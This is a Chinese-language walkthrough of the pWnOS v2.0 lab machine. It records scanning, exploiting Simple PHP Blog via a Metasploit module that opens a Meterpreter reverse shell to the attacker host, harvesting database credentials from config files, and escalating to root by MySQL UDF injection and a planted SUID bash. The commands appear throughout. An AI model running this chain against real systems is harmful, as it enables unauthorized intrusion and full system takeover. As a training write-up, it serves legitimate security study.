pWnOS v2.0
主机发现端口扫描
探测存活主机,
150为靶机1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17nmap -sP 192.168.75.0/24
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 12:44 CST
Nmap scan report for 192.168.75.1
Host is up (0.00013s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:FB:CA:45 (VMware)
Nmap scan report for 192.168.75.150
Host is up (0.00030s latency).
MAC Address: 00:0C:29:5D:85:45 (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.00010s latency).
MAC Address: 00:50:56:FB:E7:F4 (VMware)
Nmap scan report for 192.168.75.131
Host is up.扫描主机所有端口
1
2
3
4
5
6
7
8
9
10nmap -sT -min-rate 10000 -p- 192.168.75.150
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 12:48 CST
Nmap scan report for 192.168.75.150
Host is up (0.00027s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:5D:85:45 (VMware)扫描服务版本及系统版本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17nmap -sT -sV -O -p22,80 192.168.75.150
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 12:49 CST
Nmap scan report for 192.168.75.150
Host is up (0.00046s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
MAC Address: 00:0C:29:5D:85:45 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel扫描漏洞
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50nmap -script=vuln -p22,80 192.168.75.150
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 12:50 CST
Nmap scan report for 192.168.75.150
Host is up (0.00044s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
| /login.php:
| PHPSESSID:
| httponly flag not set
| /login/:
| PHPSESSID:
| httponly flag not set
| /index/:
| PHPSESSID:
| httponly flag not set
| /register/:
| PHPSESSID:
|_ httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.150
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.75.150:80/login.php
| Form id:
| Form action: login.php
|
| Path: http://192.168.75.150:80/register.php
| Form id:
|_ Form action: register.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /blog/: Blog
| /login.php: Possible admin folder
| /login/: Login page
| /info.php: Possible information file
| /icons/: Potentially interesting folder w/ directory listing
| /includes/: Potentially interesting directory w/ listing on 'apache/2.2.17 (ubuntu)'
| /index/: Potentially interesting folder
| /info/: Potentially interesting folder
|_ /register/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:5D:85:45 (VMware)难得发现疑似
csrf,但在靶机上用处好像不大,还发现了一些可能感兴趣的路径
web渗透
扫描目录
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27dirsearch -u 192.168.75.150 -x 403
[13:08:27] Starting:
[13:08:36] 302 - 20B - /activate -> http://10.10.10.100/index.php
[13:08:48] 301 - 248B - /blog -> http://192.168.75.150/blog/
[13:08:49] 200 - 2KB - /blog/
[13:09:01] 301 - 251B - /includes -> http://192.168.75.150/includes/
[13:09:01] 200 - 546B - /includes/
[13:09:02] 200 - 9KB - /info
[13:09:02] 200 - 9KB - /info.php
[13:09:05] 200 - 629B - /login
[13:09:05] 200 - 629B - /login.php
[13:09:05] 200 - 629B - /login/super
[13:09:05] 200 - 629B - /login/
[13:09:05] 200 - 629B - /login/cpanel.aspx
[13:09:05] 200 - 629B - /login/admin/
[13:09:05] 200 - 629B - /login/cpanel.php
[13:09:05] 200 - 629B - /login/cpanel.js
[13:09:05] 200 - 629B - /login/cpanel.html
[13:09:05] 200 - 629B - /login/login
[13:09:05] 200 - 629B - /login/oauth/
[13:09:05] 200 - 629B - /login/admin/admin.asp
[13:09:05] 200 - 629B - /login/cpanel.jsp
[13:09:05] 200 - 629B - /login/index
[13:09:05] 200 - 629B - /login/administrator/
[13:09:05] 200 - 629B - /login/cpanel/
[13:09:18] 200 - 723B - /register.php
[13:09:18] 200 - 723B - /register访问敏感目录
/blog/blog博客页面/blog/login.phpblog登陆页面/info.phpphpinfo
都是注册或者登陆界面
/index.php泄露了管理员邮箱尝试弱密码爆破admin@isints.com,爆破失败在
/login.php界面尝试sql注入,在**Email Address** 后面加'爆出sql语句1
admin@isints.com'
1
An error occurred in script '/var/www/login.php' on line 47: Query: SELECT * FROM users WHERE email='admin@isints.com'' AND pass='356a192b7913b04c54574d18c28d46e6395428ab' AND active IS NULL
加上
#号闭合语句让语句为真1
email=admin@isints.com'#&pass=1&submit=Login&submitted=TRUE
提示:
WAF: SQL Injection Attack Detected. Details Logged. Denying Session. Goodbye!被WAF阻止了,换路子
尝试寻找
/blog/的漏洞打开
F12,看看能不能查到是什么CMS,找到Simple PHP Blog 0.4.0可能就是CMS的名称网上查阅
Simple PHP Blog 0.4.0的漏洞敏感文件泄露:https://github.com/advisories/GHSA-p35h-cp5r-m46j ,在
/blog/config/泄露了password.txt获得密码$1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/使用 hash-identifier 识别不到使用
msf查找是否存在漏洞1
2
3
4
5
6
7
8msf6 > search simple php blog
//
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/sphpblog_file_upload 2005-08-25 excellent Yes Simple PHP Blog Remote Command Execution存在,使用该
exploit模块1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54msf6 > use exploit/unix/webapp/sphpblog_file_upload //使用该模块
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/sphpblog_file_upload) > show options //查看该模块需要配置什么
Module options (exploit/unix/webapp/sphpblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /sphpblog yes Sphpblog directory path
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.75.151 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/sphpblog_file_upload) > set rhosts 192.168.75.150 //靶机ip
rhosts => 192.168.75.150
msf6 exploit(unix/webapp/sphpblog_file_upload) > set rport 80 //靶机端口
rport => 80
msf6 exploit(unix/webapp/sphpblog_file_upload) > set uri /blog/ //攻击目录
uri => /blog/
msf6 exploit(unix/webapp/sphpblog_file_upload) > exploit //启动攻击
[*] Started reverse TCP handler on 192.168.75.151:4444
[+] Successfully retrieved hash: $1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/
[+] Successfully removed /config/password.txt
[+] Successfully created temporary account.
[+] Successfully logged in as OTmoxq:ykM0Fg
[+] Successfully retrieved cookie: ii9ppvao0fveedft2314so41u3
[+] Successfully uploaded pVmL1BgOJLbmlN8mucTA.php
[+] Successfully uploaded gy904amvE6YvJp3W7xkC.php
[+] Successfully reset original password hash.
[+] Successfully removed /images/pVmL1BgOJLbmlN8mucTA.php
[*] Calling payload: /images/gy904amvE6YvJp3W7xkC.php
[*] Sending stage (39927 bytes) to 192.168.75.150
[*] Meterpreter session 1 opened (192.168.75.151:4444 -> 192.168.75.150:42500) at 2024-09-24 18:01:33 +0800
[+] Successfully removed /images/gy904amvE6YvJp3W7xkC.php
meterpreter >攻击成功,输入
shell以获得靶机shell1
2
3
4
5
6
7
8
9meterpreter > shell
Process 1680 created.
Channel 0 created.
sh: getcwd() failed: No such file or directory
sh: getcwd() failed: No such file or directory
python -c "import pty;pty.spawn('/bin/bash')" //获得交互性更好的shell
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
www-data@web:$获得
www-data的shell
提权
查看权限
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20www-data@web:$ whoami
www-data
//
www-data@web:$ uname -a
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
//
www-data@web:$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:5d:85:45 brd ff:ff:ff:ff:ff:ff
inet 192.168.75.150/24 brd 192.168.75.255 scope global eth0
inet6 fe80::20c:29ff:fe5d:8545/64 scope link
valid_lft forever preferred_lft forever
//
www-data@web:$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)信息收集
获取数据库连接配置文件,获得数据库用户
root,密码goodday1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17www-data@web:/var/www$ cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );尝试登录,登陆失败,继续寻找mysql连接配置文件
根据上面发现的连接配置的文件来寻找
1
2
3www-data@web:/var/www$ find / -name '*mysqli_connect*' 2>/dev/null
/var/mysqli_connect.php
/var/www/mysqli_connect.php1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16www-data@web:/var/www$ cat /var/mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>获得密码
root@ISIntS,尝试登陆成功查询数据,发现一个用户
Dan,尝试ssh登录1
2
3
4
5
6
7
8mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+----------------------------------+---------------------+
| user_id | first_name | last_name | email | pass | user_level | active | registration_date |
+---------+------------+-----------+------------------+------------------------------------------+------------+----------------------------------+---------------------+
| 1 | Dan | Privett | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af | 0 | NULL | 2011-05-07 17:27:01 |
+---------+------------+-----------+------------------+------------------------------------------+------------+----------------------------------+---------------------+
2 rows in set (0.00 sec)破译密码得:
killerbeesareflying,ssh尝试登陆失败,密码是错的因为我们有数据库root权限,所以可以尝试UDF提权
查看
secure_priv权限 ,符合要求1
2
3
4
5
6
7mysql> SHOW VARIABLES LIKE "secure_file_priv";
SHOW VARIABLES LIKE "secure_file_priv";
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_file_priv | |
+------------------+-------+查看plugin路径,存放在
/usr/lib/mysql/plugin1
2
3
4
5
6
7mysql> show variables like '%plugin%';
show variables like '%plugin%';
+---------------+-----------------------+
| Variable_name | Value |
+---------------+-----------------------+
| plugin_dir | /usr/lib/mysql/plugin |
+---------------+-----------------------+动态链接库存放在kali 的
/usr/share/metasploit-framework/data/exploits/mysql下,将动态链接库文件传到靶机的/tmp文件夹1
2
3
4
5
6cd /usr/share/metasploit-framework/data/exploits/mysql
// 选择版本传到靶机
lib_mysqludf_sys_32.dll
lib_mysqludf_sys_64.dll
lib_mysqludf_sys_32.so
lib_mysqludf_sys_64.so将动态链接库传入到plugin路径
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27mysql> use mysql;
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.00 sec)
mysql> insert into foo values (load_file('/tmp/lib_mysqludf_sys_64.so'))
Query OK, 1 row affected (0.00 sec)
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/udf.so';
Query OK, 1 row affected (0.00 sec)
mysql> create function sys_eval returns string soname 'udf.so';
Query OK, 0 rows affected (0.00 sec)
mysql> select * from mysql.func;
+----------+-----+--------+----------+
| name | ret | dl | type |
+----------+-----+--------+----------+
| sys_eval | 2 | udf.so | function |
+----------+-----+--------+----------+
mysql> select sys_eval('whoami'); // 函数存在root函数
+--------------------+
| sys_eval('whoami') |
+--------------------+
| root |
+--------------------+
提权
创建用户自定义函数后,函数获得root权限,通过函数来获得
root的shell1
2
3
4
5
6mysql> select sys_eval('cp /bin/bash /tmp/binbash; chmod +xs /tmp/binbash');
+---------------------------------------------------------------+
| sys_eval('cp /bin/bash /tmp/binbash; chmod +xs /tmp/binbash') |
+---------------------------------------------------------------+
| NULL |
+---------------------------------------------------------------+cp /bin/bash /tmp/binbash:将/bin/bash文件复制到/tmp目录,并命名为binbash。chmod +xs /tmp/binbash:给复制的文件binbash设置 SUID 位,这样当用户执行该文件时,进程将以文件拥有者(通常是 root)的权限运行。
获得shell
1
2
3
4www-data@web:/tmp$ /tmp/binbash -p
//
binbash-4.2# whoam
root
思路
因为获得了数据库密码,并且是root用户,查看配置适合使用UDF